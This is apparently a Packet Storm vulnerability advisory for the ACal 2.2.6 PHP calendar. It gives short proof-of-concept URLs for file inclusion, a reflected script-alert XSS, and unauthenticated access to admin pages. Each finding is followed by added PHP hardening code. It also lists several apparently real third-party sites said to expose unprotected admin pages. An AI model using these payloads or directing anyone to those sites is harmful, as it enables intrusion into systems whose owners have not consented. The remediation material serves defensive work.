ACal 2.2.6 LFI / XSS / Authentication Bypass

2013-12-30T00:00:00
ID PACKETSTORM:124623
Type packetstorm
Reporter TUNISIAN CYBER
Modified 2013-12-30T00:00:00

Description

[+] Author: TUNISIAN CYBER  
[+] Exploit Title: Acal LFI/XSS/Auth Bypass Vulnerabilities  
[+] Category: WebApp  
[+] Google Dork: Use your mind  
[+] Tested on: KaliLinux  
[+] Vendor: http://acalproj.sourceforge.net/  
  
  
########################################################################################  
  
+Description:  
A web based event calendar that does not require a database server.   
It is made to be easy to install and to be able to run on just about any typical ISP's server with PHP installed.  
+Exploit:  
  
Acal suffers from LFI, XSS and authentication bypass vulnerabilities:  
  
1/LFI:  
  
File(s): example.php : Lines 24--30  
Parameter: view  
  
[PHP]  
// DO NOT EDIT  
if (!isset($_GET['view'])) {  
    include $path . 'embed/' . $view . '.php';  
}  
else {  
    // $_GET['view'] is concatenated into the include path without any validation  
    include $path . 'embed/' . $_GET['view'] . '.php';  
}  
[/PHP]  
  
P.O.C:  
127.0.0.1/calendar/embed/example/example.php?view=[LFI]  
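The root cause above is that the request value itself becomes part of the include path. The following is an added example, not ACal's own code, of how that include can be hardened: the `?view=` value is only used to select an entry from a fixed allowlist, and the resolved file is additionally checked to sit under the embed directory. `$path` and `$view` are the variables from the original snippet; the view names in `ALLOWED_VIEWS`, the function name `resolve_embed_view` and the stand-alone defaults are assumptions.

```php
<?php
// Added example (not ACal's code): safe replacement for the include in example.php.
// $path and $view are set by ACal's own setup code; defaults here only allow
// running this file stand-alone.
$path = $path ?? dirname(__DIR__, 2) . '/';
$view = $view ?? 'month';

// Only these names may ever be turned into a file path (hypothetical view names).
const ALLOWED_VIEWS = ['day', 'week', 'month'];

/**
 * Map the requested view name to an embed file, or return null if it is not allowed.
 * The request value is never concatenated into the path; it only chooses an
 * allowlist entry, so "../", null bytes and stream wrappers have no effect.
 */
function resolve_embed_view(string $path, ?string $requested, string $default): ?string
{
    $name = $requested ?? $default;
    if (!in_array($name, ALLOWED_VIEWS, true)) {
        return null;
    }

    $file = $path . 'embed/' . $name . '.php';

    // Defence in depth: even an allowlisted name must resolve inside embed/.
    $real = realpath($file);
    $base = realpath($path . 'embed');
    if ($real === false || $base === false
        || strpos($real, $base . DIRECTORY_SEPARATOR) !== 0) {
        return null;
    }
    return $real;
}

$file = resolve_embed_view($path, $_GET['view'] ?? null, $view);
if ($file === null) {
    http_response_code(400);
    exit('Unknown view');
}
include $file;
```

Rejected requests return a 400 rather than silently falling back to the default view, which also makes probing of this parameter visible in the access log.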
  
2/ XSS:  
127.0.0.1/calendar/calendar.php?year=<script>alert(111)</script>  
http://s13.postimg.org/u9bvlrg1i/www.jpg  
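The `year` value is reflected into the page unencoded. As an added example, not taken from ACal, the handler below validates the parameter as an integer in a plausible range before use and HTML-encodes everything it echoes. The range limits, the function names `safe_year` and `h`, and the page markup are assumptions.

```php
<?php
// Added example (not ACal's code): safe handling of calendar.php?year=...
// Two independent controls: the value is validated as an integer on input,
// and anything written into HTML is encoded on output.

function safe_year(?string $raw, int $fallback): int
{
    // Non-integers (including "<script>...") fail validation and are replaced by the fallback.
    $y = filter_var($raw, FILTER_VALIDATE_INT, [
        'options' => ['min_range' => 1970, 'max_range' => 2100],  // assumed range
    ]);
    return $y === false ? $fallback : $y;
}

// Output encoding for HTML text and attribute contexts.
function h(string $s): string
{
    return htmlspecialchars($s, ENT_QUOTES | ENT_HTML5, 'UTF-8');
}

$year = safe_year($_GET['year'] ?? null, (int) date('Y'));

header('Content-Type: text/html; charset=UTF-8');
echo '<h1>Calendar for ' . h((string) $year) . '</h1>';
// Even values that are already integers are encoded when they reach a link,
// so the habit holds for parameters that are not numeric.
echo '<a href="calendar.php?year=' . h((string) ($year + 1)) . '">next year</a>';
```

Validating on input would be enough for a numeric parameter on its own; encoding on output is what protects the free-text parameters the same page may reflect.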
  
3/Auth Bypass:  
The admin panel can be reached directly without authenticating, and the login details can be changed from it:  
127.0.0.1/calendar/admin/changelogin.php  
  
Demo:  
http://www.benifeade.com/i/calendar/admin/changelogin.php  
http://www.diprove.unimi.it/calendar/admin/edit.php  
http://tavernadeglieroi.altervista.org/calendar/admin/edit.php  
http://www.davidcarrjr.com/CAL/calendar/admin/changelogin.php  
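Scripts such as changelogin.php and edit.php act before checking that a session has been authenticated. As an added example, not ACal's own code, the guard below is what each admin/ script would require on its first line; it redirects unauthenticated requests before any of the script's logic runs. How ACal stores credentials is not shown on the page, so the session key `acal_admin`, the login page path and the `password_verify` flow are assumptions.

```php
<?php
// Added example (not ACal's code): admin/auth_guard.php, required by every admin script.
// Assumed layout: login.php sets $_SESSION['acal_admin'] after a successful check;
// every other admin page calls require_admin() before doing anything.

session_start();

/** Stop the request unless the session was authenticated by the login script. */
function require_admin(): void
{
    if (empty($_SESSION['acal_admin'])) {          // assumed session flag
        session_unset();
        header('Location: /calendar/admin/login.php', true, 302);  // assumed login page
        exit;
    }
}

/**
 * Assumed login check for login.php: compare against a stored password_hash()
 * value rather than a plaintext password, and rotate the session id on success
 * so a session fixed before login cannot be reused.
 */
function admin_login(string $user, string $password, array $stored): bool
{
    if (!isset($stored[$user]) || !password_verify($password, $stored[$user])) {
        return false;
    }
    session_regenerate_id(true);
    $_SESSION['acal_admin'] = $user;
    return true;
}

// In changelogin.php / edit.php the very first statement would be:
require_once __DIR__ . '/auth_guard.php';
require_admin();
// ...the page's own form handling follows only for authenticated admins.
```

A change-credentials page should additionally re-check the current password before accepting a new one, so that a hijacked session alone is not enough to lock the real administrator out.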
  
./3nD  
########################################################################################  
Greets to: XMaX-tn, N43il HacK3r, XtechSEt  
Sec4Ever Members:  
DamaneDz  
UzunDz  
GEOIX  
########################################################################################  